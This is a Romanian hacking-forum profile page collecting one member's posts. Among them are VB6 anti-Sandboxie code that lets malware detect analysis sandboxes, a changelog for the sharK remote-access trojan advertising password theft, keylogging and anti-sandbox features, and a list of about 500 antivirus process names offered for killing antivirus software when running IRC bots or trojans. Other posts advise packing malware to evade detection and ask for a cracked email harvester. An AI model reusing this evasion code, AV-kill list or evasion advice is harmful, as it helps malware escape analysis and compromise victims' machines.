Jump to content

NullCode

Active Members
  • Posts

    179
  • Joined

  • Last visited

Everything posted by NullCode

  1. Ptr cei ce nu stiu ce e un sandbox .. sa spunem ca e ceva ce folosesc unii sa afle ce fac un virus . =============================================== =============================================== /*****************************************************\ a small and simple IRC bot for learning purposes by skorikov 2007 -- I was originally planning on putting detailed comments but i got a bit lazy half way through, sorry \*****************************************************/ #define WIN32 /*#define LINUX*/ #ifdef WIN32 #include <windows.h> #include <winsock.h> #define BUILD_TYPE "WIN32" #endif #ifdef LINUX #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #define BUILD_TYPE "LINUX" #endif #include <stdio.h> #include <stdlib.h> #include <string.h> #include <malloc.h> #include <stdarg.h> #define IRC_BUFFER_SIZE 512 #define MAX_ARGS 256 #ifdef WIN32 #define vsnprintf _vsnprintf #define snprintf _snprintf #endif /********************************************************************\ IRC_CLIENT CONFIGURATION \********************************************************************/ const char *IRC_SERVER = "irc.bluehell.org"; const short IRC_PORT = 6667; const char *IRC_CHAN = "#testchan"; const char *IRC_CHANKEY = "key"; const char *IRC_NICK = "SmallBot"; const char *IRC_REALNAME = "Small IRC Bot"; const char IRC_CMD_TRIGGER = '.'; /********************************************************************\ COMMAND PROTOTYPES \********************************************************************/ void cmd_quit(int sock, char *from_p, char **arg_p, int arg_count), cmd_test(int sock, char *from_p, char **arg_p, int arg_count), cmd_help(int sock, char *from_p, char **arg_p, int arg_count); /********************************************************************\ FUNCTION PROTOTYPES \********************************************************************/ int irc_connect(int sock, const char *remote_host_p, unsigned short remote_port), irc_send_line(int sock, const char *format_p, ...), irc_recv_line(int sock, char *line_p, unsigned int line_size); /* this is pretty much just a table of command names and pointers to their according functions */ struct irc_command { const char *command_name_p, *description_p; void (*exec_command)(int sock, char *from_p, char **arg_p, int arg_count); } /********************************************************************\ COMMAND TABLE \********************************************************************/ COMMAND[] = { {"quit", "Make the bot quit", &cmd_quit}, {"test", "A test command", &cmd_test}, {"help", "Print this menu", &cmd_help} }; /********************************************************************\ BOT MAIN \********************************************************************/ int main(int argc, char **argv) { #ifdef WIN32 WSADATA wsa_data; /* a structure to store output from the WSAStartup call, we dont do anything with this so just ignore it */ #endif int sock, /* our socket handle */ connect_attempts = 0, argument_count, i; char buffer[512] = {0}, /* buffer to recv lines from IRC */ from[56] = {0}, nick[56] = {0}, *argument[MAX_ARGS], *token_p; #ifdef WIN32 /* WSAStartup() initializes the WinSock DLL, version 2.2, MAKEWORD(2, 2) just takes 2 bytes each with a value of 2 (00000010) and puts them together like so (0000001000000010), ^^ this isn't really important so you can ignore this */ if (WSAStartup(MAKEWORD(2, 2), &wsa_data)) { printf("- fatal error: failed to initialize winsock\r\n"); return (0); } #endif /* create a socket using the INET protocol family (IPv4), and make it a streaming TCP socket */ if ((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { printf("- fatal error: socket() failed.\r\n"); return (0); } printf("- Created socket\r\n"); if (!irc_connect(sock, IRC_SERVER, IRC_PORT)) { printf("- Failed to connect to %s:%i\r\n", IRC_SERVER, IRC_PORT); return (0); } printf("- Connected to %s:%i\r\n", IRC_SERVER, IRC_PORT); snprintf(nick, sizeof(nick), "%s", IRC_NICK); irc_send_line(sock, "USER %s 127.0.0.1 localhost :%s", IRC_NICK, IRC_REALNAME); irc_send_line(sock, "NICK %s", nick); while (1) { memset(buffer, 0, sizeof(buffer)); if (irc_recv_line(sock, buffer, sizeof(buffer)) == 0) break; token_p = strtok(buffer, " "); argument_count = 0; while (token_p != NULL) { argument[argument_count] = token_p; token_p = strtok(NULL, " "); argument_count++; } if (argument_count > 2) { if (strcmp(argument[1], "001") == 0) { irc_send_line(sock, "JOIN %s :%s", IRC_CHAN, IRC_CHANKEY); continue; } else if (strcmp(argument[1], "433") == 0) { strncat(nick, "_", 1); irc_send_line(sock, "NICK %s", nick); continue; } } if (argument_count == 2) { if (strcmp(argument[0], "PING") == 0) { irc_send_line(sock, "PONG %s", argument[1]); continue; } } if (argument_count >= 4) { if (strcmp(argument[1], "PRIVMSG") == 0) { snprintf(from, sizeof(from), "%s", argument[2]); /* this just shifts the argument variable the numbers of bytes there are before the PRIVMSG text so ":user@host PRIVMSG #channel :message here" becomes just "message here" */ if (argument[3][1] == IRC_CMD_TRIGGER) { *argument += (strlen(argument[0]) + 1) + (strlen(argument[1]) + 1) + (strlen(argument[2]) + 3); for (i = 0; i < sizeof(COMMAND) / sizeof(struct irc_command); ++i) { if (strcmp(argument[0], COMMAND.command_name_p) == 0) { COMMAND.exec_command(sock, from, argument, argument_count - 3); break; } } } continue; } } } printf("- Disconnected\r\n"); #ifdef WIN32 /* clean up after ourselves */ WSACleanup(); #endif return (0); } /********************************************************************\ IRC CONNECT FUNCTION \********************************************************************/ int irc_connect(int sock, const char *remote_host_p, unsigned short remote_port) { struct sockaddr_in sin; /* a structure which tells our socket where it's connecting to */ struct hostent *hostent_p; /* a structure which will store results from the DNS query we do for remote_host_p */ /* perform a DNS query to find the IP address of remote_host_p */ if (!(hostent_p = gethostbyname(remote_host_p))) return (0); memset(&sin, 0, sizeof(sin)); sin.sin_family = PF_INET; /* IPv4 */ sin.sin_addr.s_addr = *(long *) hostent_p->h_addr; /* take the IP address returned */ sin.sin_port = htons(remote_port); /* convert remote_port to a network order byte */ printf("- Resolved %s to %s\r\n", remote_host_p, inet_ntoa(sin.sin_addr)); /* tell the socket to connect */ if (connect(sock, (struct sockaddr *) &sin, sizeof(sin)) == -1) return (0); return (1); } /********************************************************************\ IRC SEND LINE FUNCTION \********************************************************************/ int irc_send_line(int sock, const char *format_p, ...) { va_list args; char buffer[512] = {0}; va_start(args, format_p); vsnprintf(buffer, sizeof(buffer), format_p, args); va_end(args); strncat(buffer, "\r\n", (sizeof(buffer) - strlen(buffer))); printf(">> %s", buffer); return (send(sock, buffer, strlen(buffer), 0)); } /********************************************************************\ IRC RECIEVE LINE FUNCTION \********************************************************************/ int irc_recv_line(int sock, char *line_p, unsigned int line_size) { char byte = 0; /* recv one byte at a time from the socket untill you reach a newline (\n) character */ while (byte != '\n' && strlen(line_p) < line_size) { if (!recv(sock, (char *) &byte, 1, 0)) return (0); if (byte != '\r' && byte != '\n' && byte != '\0') { strncat(line_p, (char *) &byte, 1); } } printf("<< %s\r\n", line_p); return (1); } /********************************************************************\ QUIT COMMAND FUNCTION \********************************************************************/ void cmd_quit(int sock, char *from_p, char **arg_p, int arg_count) { irc_send_line(sock, "QUIT"); } /********************************************************************\ TEST COMMAND FUNCTION \********************************************************************/ void cmd_test(int sock, char *from_p, char **arg_p, int arg_count) { irc_send_line(sock, "PRIVMSG %s :This is a test. Did it work?", from_p); } /********************************************************************\ HELP COMMAND FUNCTION \********************************************************************/ void cmd_help(int sock, char *from_p, char **arg_p, int arg_count) { unsigned int i; irc_send_line(sock, "PRIVMSG %s :(Help): Build type: %s (%s, %s)", from_p, BUILD_TYPE, __DATE__, __TIME__); irc_send_line(sock, "PRIVMSG %s :(Help): COMMAND DESCRIPTION", from_p); for (i = 0; i < sizeof(COMMAND) / sizeof(struct irc_command); ++i) { irc_send_line(sock, "PRIVMSG %s :(Help): %s %s", from_p, COMMAND.command_name_p, COMMAND.description_p); } } =============================================== =============================================== =============================================== =============================================== =============================================== =============================================== =============================================== =============================================== Not my code - ' ================================================== ======= ' Anti Sandboxie Code by ZiG = ' = ' For testing purposes only! = ' I'm Not responsible For anything you Do With this code! = ' ================================================== ======= Option Explicit Private Declare Function CreateToolhelpSnapshot Lib "kernel32" Alias "CreateToolhelp32Snapshot" (ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long Private Declare Function ProcessFirst Lib "kernel32" Alias "Process32First" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long Private Declare Function ProcessNext Lib "kernel32" Alias "Process32Next" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long Private Declare Sub CloseHandle Lib "kernel32" (ByVal hObject As Long) Private Const TH32CS_SNAPPROCESS = &H2 Private Const MAX_PATH As Long = 260 Private Type PROCESSENTRY32 dwSize As Long cntUsage As Long th32ProcessID As Long th32DefaultHeapID As Long th32ModuleID As Long cntThreads As Long th32ParentProcessID As Long pcPriClassBase As Long dwFlags As Long szExeFile As String * MAX_PATH End Type Public Function Sandboxed(ByVal nFilename As String) As Boolean Dim nSnapshot As Long, nProcess As PROCESSENTRY32 Dim nResult As Long, ParentID As Long, IDCheck As Boolean 'Abbild der Prozesse machen nSnapshot = CreateToolhelpSnapshot(TH32CS_SNAPPROCESS, 0&) If nSnapshot <> 0 Then nProcess.dwSize = Len(nProcess) 'Zeiger auf ersten Prozess bewegen nResult = ProcessFirst(nSnapshot, nProcess) Do Until nResult = 0 'Überprüfen ob der Prozessname mit dem Namen der exe übereinstimmt. If InStr(LCase$(nProcess.szExeFile), LCase$(nFilename)) <> 0 Then 'Wir merken uns die ParentProcessID ParentID = nProcess.th32ParentProcessID 'Wir beginnen nochmal beim ersten Prozess nResult = ProcessFirst(nSnapshot, nProcess) Do Until nResult = 0 'Wir suchen den Process mit der ParentID If nProcess.th32ProcessID = ParentID Then 'Falls so ein Prozess vorhanden ist, dann ist das Programm nicht sandboxed IDCheck = False Exit Do Else IDCheck = True nResult = ProcessNext(nSnapshot, nProcess) End If Loop 'Falls check True ist, dann ist das Programm Sandboxed Sandboxed = IDCheck Exit Do End If 'Zum nächsten Prozess nResult = ProcessNext(nSnapshot, nProcess) Loop ' Handle wird geschloßen CloseHandle nSnapshot End If End Function Aufrufen könnt ihr das ganze dann so: Visual Basic Code: Private Sub Form_Load() If Sandboxed(App.EXEName) Then 'Programm läuft In der Sandbox Else 'Programm läuft nicht In der Sandbox 'Programm kann normal weiterlaufen End If End Sub
  2. [dev] sharK 2.4 Release 15 August 2007 | 21:00 | + = New Feature * = Bugfix [+] Delayed Connection (Pic: http://shark-project.net/delay.png) [+] Idletime in SIN Console (Pic: http://shark-project.net/idle.png) [+] Anti-NormanSandbox [+] Chose your Stub in a Box directly in the ServerBuilder [+] Checkboxes on the Lock/Disable/Suspend Stuff for viewing the current state [+] You can hold-up disconnected Serverwindows [+] fwbp+ [+] Read-Out Firefox Passwords without uploading 3rdparty apps [+] Serverwindow won't be closed when connection is lost [+] Add new method Server-Updater [+] Add "Show Transfer Queue" button in Serverwindow of Client [+] Use a faster way of storing offline keylog [+] Readout Passwords WITHOUT external apps [+] Improved Blacklist [+] New Stable Upload Function, Does NOT work with older Server [*] Server creates Install-Directorys when not present (esp on Custom-Path) [*] Fixed Bug in EditServer (Wait-For-Reboot) [*] Fix: Search can ping-out the server [*] Server reconnected when making too many thumbs [*] Fixed some Bugs in Transfer System [*] SharK should handle more connections [*] Some Typo Fixes [*] Server crashed when locking Workstation [*] Text-Files in C2S-Chat disabled when session active [*] Server didn't return error when compressing a file on a read-only disc [*] Server can handle bad uploads, e.g. on read-only discs [*] Improved Ping-Feature [*] Fixed Runtime-Error-Bug in Reverse Proxy Download: http://shark-project.net
  3. astea sunt povesti ma .. programatori f buni avem .. care sunt in america/germania/etc.. la microsoft si alte companii ..unde castigat 10k$ pe luna ..deci .. astia sunt doar niste programatori buni . si totusi odata ce a dat de gustul banilor ( facuti usori ) nu ma lucra ala 8 ore pe zi pentru 2k$ ..
  4. programatori buni
  5. Foarte bun articolul .. la obiect . Felicitari si Multumesc.
  6. Salut .. are careva Atomic Email Hunter 3.20 .. ultima versiune nu are crack .. si as vrea k cineva sa o uploadeze p aceasta .. .. ma ajunta Careva? P.S.:Nu vreau alte chestii cum ar fii .. spider etc.
  7. ptr ce sa stie de la ce sunt ? oricum se prind oamenii dak stiu despre ce e vb
  8. Poate ar fii bine un TOPIC de socks,proxy si alte programe cum ar fi sockscap ..proxifier..etc..
  9. Aici e o lista.. destul de mare a proceselor antivirusilor ... P.S.:Va foloseste la inchiderea acestor in caz ca aveti vreun rxbot,spybot, ..etc..sau vreun trojan _AVP32 _AVP32.EXE _AVPCC _AVPCC _AVPCC.EXE _AVPM _AVPM.EXE AckWin32 AckWin32 ACKWIN32 AckWin32.exe AckWin32.exe ACKWIN32.EXE ADVXDWIN ADVXDWIN.EXE agentw.exe ALERTSVC ALERTSVC.EXE ALOGSERV alogserv ALOGSERV alogserv.exe ALOGSERV.EXE AMON9X AMON9X.EXE ANTI-TROJAN ANTI-TROJAN.EXE ANTS ANTS.EXE APVXDWIN apvxdwin APVXDWIN.EXE apvxdwin.exe ATCON ATCON.EXE ATUPDATER ATUPDATER.EXE ATWATCH ATWATCH.EXE AUTODOWN AutoDown AUTODOWN AUTODOWN.exe AutoDown.exe AUTODOWN.EXE AutoTrace AutoTrace.exe AVCONSOL AVCONSOL.EXE AVGCC32 AVGCC32 AVGCC32.EXE AVGCC32.EXE AVGCTRL Avgctrl AVGCTRL.EXE Avgctrl.exe AvgServ AVGSERV AvgServ AVGSERV AVGSERV.EXE AVGSERV.EXE AVGSERV9 AVGSERV9.EXE AVGW AVGW.EXE avkpop avkpop.exe AvkServ AvkServ.exe avkservice avkservice.exe avkwctl9 avkwctl9.exe AVP AVP.EXE AVP32 AVP32.EXE AVPCC avpm avpm AVPM avpm.exe AVPM.EXE Avsched32 Avsched32.exe AvSynMgr AVSYNMGR AVSYNMGR AvSynMgr AVSYNMGR AVSYNMGR.exe AVWINNT AVWINNT.EXE AVXMONITOR9X AVXMONITOR9X AVXMONITOR9X.EXE AVXMONITOR9X.EXE AVXMONITORNT AVXMONITORNT AVXMONITORNT.EXE AVXMONITORNT.EXE AVXQUAR AVXQUAR AVXQUAR.EXE AVXQUAR.EXE.EXE AVXW AVXW.EXE blackd BLACKD blackd.exe BLACKD.EXE BlackICE BlackICE.exe ccApp.exe ccEvtMgr ccEvtMgr.exe ccPxySvc.exe ccPxySvc.exe CDP.EXE cfgWiz cfgWiz.exe Claw95 Claw95 CLAW95 Claw95.exe Claw95.exe CLAW95.EXE Claw95cf CLAW95CF Claw95cf.exe CLAW95CF.EXE cleaner cleaner.EXE cleaner3 cleaner3.EXE CMGRDIAN CMGrdian CMGRDIAN CMGRDIAN.EXE CONNECTIONMONITOR CONNECTIONMONITOR.EXE CPD cpd.exe cpd.exe CPDClnt CPDCLNT.EXE CPDClnt.exe CTRL CTRL.EXE defalert defalert.exe defscangui defscangui.exe DEFWATCH DEFWATCH.EXE DOORS DOORS DOORS.EXE DOORS.EXE DVP95 DVP95.EXE DVP95_0 DVP95_0.EXE EFPEADM EFPEADM EFPEADM.exe EFPEADM.EXE ETRUSTCIPE ETRUSTCIPE ETRUSTCIPE.exe ETRUSTCIPE.EXE EVPN EVPN EVPN.exe EVPN.EXE EXPERT EXPERT.EXE F-AGNT95 F-AGNT95.EXE fameh32 fameh32.exe fch32 fch32.exe fih32 fih32.exe fnrb32 fnrb32.exe F-PROT F-PROT.EXE F-PROT95 F-PROT95.EXE FP-WIN FP-WIN.EXE FRW FRW FRW.EXE FRW.EXE fsaa fsaa.exe fsav32 fsav32.exe fsgk32 fsgk32.exe fsm32 fsm32.exe fsma32 fsma32.exe fsmb32 fsmb32.exe f-stopw F-STOPW f-stopw.exe F-STOPW.EXE gbmenu gbmenu.exe GBPOLL gbpoll GBPOLL.EXE gbpoll.exe GENERICS GENERICS.EXE GUARD GUARD GUARD.EXE GUARD.EXE GUARDDOG GUARDDOG.EXE iamapp IAMAPP IAMAPP iamapp.exe IAMAPP.EXE IAMAPP.EXE iamserv IAMSERV iamserv.exe IAMSERV.EXE IAMSTATS IAMSTATS.EXE ICLOAD95 ICLOAD95.EXE ICLOADNT ICLOADNT ICLOADNT.EXE ICLOADNT.EXE ICMON ICMON.EXE ICSUPP95 ICSUPP95 ICSUPP95.EXE ICSUPP95.EXE ICSUPPNT ICSUPPNT.EXE IFACE IFACE.EXE IOMON98 IOMON98 IOMON98.EXE IOMON98.EXE ISRV95 ISRV95.EXE JEDI JEDI.EXE LDNETMON LDNETMON.EXE LDPROMENU LDPROMENU.EXE LDSCAN LDSCAN.EXE LOCKDOWN LOCKDOWN.EXE lockdown2000 LOCKDOWN2000 lockdown2000.exe LOCKDOWN2000.EXE LUALL LUALL.EXE LUCOMSERVER LUCOMSERVER.EXE LUSPT LUSPT.exe MCAGENT MCAGENT.EXE MCMNHDLR MCMNHDLR.EXE Mcshield.exe MCTOOL MCTOOL.EXE MCUPDATE MCUPDATE.EXE MCVSRTE MCVSRTE.EXE MCVSSHLD MCVSSHLD.EXE MGAVRTCL MGAVRTCL.EXE MGAVRTE MGAVRTE.EXE MGHTML MGHTML.EXE MINILOG MINILOG.EXE Monitor MONITOR Monitor.exe MONITOR.EXE MOOLIVE MOOLIVE.EXE MPFAGENT.EXE MPFSERVICE MPFSERVICE.exe MPFTRAY.EXE MWATCH MWATCH MWATCH.exe MWATCH.EXE NAV Auto-Protect NAV Auto-Protect NAVAP NAVAP navapsvc navapsvc NAVAPSVC.EXE navapsvc.exe navapw32 NAVAPW32 NAVAPW32.EXE NAVENGNAVEX15 NAVENGNAVEX15 NAVLU32 NAVLU32.EXE Navw32 NAVW32 Navw32.exe NAVWNT NAVWNT.EXE NDD32 NDD32.EXE NeoWatchLog NeoWatchLog.exe NETUTILS NETUTILS.EXE NISSERV NISSERV NISSERV.EXE NISSERV.EXE NISSERV.EXE NISUM NISUM NISUM.EXE NISUM.EXE NMAIN NMAIN.EXE NORMIST NORMIST NORMIST.EXE NORMIST.EXE notstart notstart.exe NPROTECT NPROTECT.EXE npscheck npscheck.exe NPSSVC NPSSVC.EXE NSCHED32 NSCHED32.EXE ntrtscan ntrtscan.EXE NTVDM NTVDM.EXE NTXconfig NTXconfig.exe Nui.EXE Nupgrade Nupgrade.exe NVC95 NVC95 NVC95.EXE NVC95.EXE NVSVC32 NVSVC32 NWService NWService.exe NWTOOL16 NWTOOL16.EXE PADMIN PADMIN.EXE PAVPROXY pavproxy PAVPROXY.EXE pavproxy.exe PCCIOMON PCCIOMON PCCIOMON.EXE PCCIOMON.EXE pccntmon pccntmon.EXE pccwin97 pccwin97.EXE PCCWIN98 PCCWIN98.EXE pcscan pcscan.EXE PERSFW PERSFW.EXE PERSWF PERSWF.EXE POP3TRAP POP3TRAP.EXE POPROXY POPROXY.EXE PORTMONITOR PORTMONITOR.EXE PROCESSMONITOR PROCESSMONITOR.EXE PROGRAMAUDITOR PROGRAMAUDITOR.EXE PVIEW95 PVIEW95.EXE rapapp.exe RAV7 RAV7.EXE RAV7WIN RAV7WIN.EXE REALMON REALMON.EXE Rescue RESCUE Rescue.exe RESCUE.EXE RTVSCN95 RTVSCN95.EXE RULAUNCH RULAUNCH.EXE sbserv sbserv.exe SCAN32 SCAN32.EXE SCRSCAN SCRSCAN.EXE Smc SMC.EXE Sphinx SPHINX Sphinx.exe SPHINX.EXE SPYXX SPYXX.EXE SS3EDIT SS3EDIT.EXE SWEEP95 SWEEP95.EXE SweepNet SweepNet SWEEPSRV.SYS SWEEPSRV.SYS SWNETSUP SWNETSUP.EXE SymProxySvc SymProxySvc.exe SYMTRAY SYMTRAY.EXE TAUMON TAUMON.EXE TC TC.EXE TCA TCA.EXE TCM TCM.EXE TDS-3 TDS-3.EXE TFAK TFAK.EXE vbcmserv vbcmserv vbcmserv.exe vbcmserv.exe VbCons VbCons VbCons.exe VbCons.exe VET32 VET32 VET32.exe VET32.EXE Vet95 VET95 Vet95.exe VET95.EXE VetTray VETTRAY VetTray.exe VETTRAY.EXE VIR-HELP VIR-HELP.EXE VPC32 VPC32.EXE VPTRAY VPTRAY.EXE VSCHED VSCHED.EXE VSECOMR VSECOMR VSECOMR.EXE VSECOMR.EXE vshwin32 VSHWIN32 VSHWIN32 VSHWIN32.EXE VSMAIN VSMAIN.EXE vsmon vsmon.exe VSMON.EXE VSSTAT VSSTAT VSSTAT.EXE WATCHDOG WATCHDOG.EXE WEBSCANX WEBSCANX WEBSCANX.EXE WEBTRAP WEBTRAP.EXE WGFE95 WGFE95.EXE WIMMUN32 WIMMUN32.EXE WrAdmin WRADMIN WRADMIN WrAdmin.exe WRADMIN.EXE WRADMIN.EXE WrCtrl WRCTRL WRCTRL WrCtrl.exe WRCTRL.EXE zapro zapro.exe zonealarm zonealarm.exe 500 de procese. Nu stiam unde sa le pun ..
  10. nu merge metoda ta ... nu vei putea sa le bindezi impreuna din nou .. cel mai usor e sa cauti packere necomerciale si sa il pachetezi .. sau un packer si apoi un scramble ceva.. totusi cel mai bine e sa incerci sa rescrii putin codur sursa.. Cum s-a zis mai sus .. AV cauta headeru ..
×
×
  • Create New...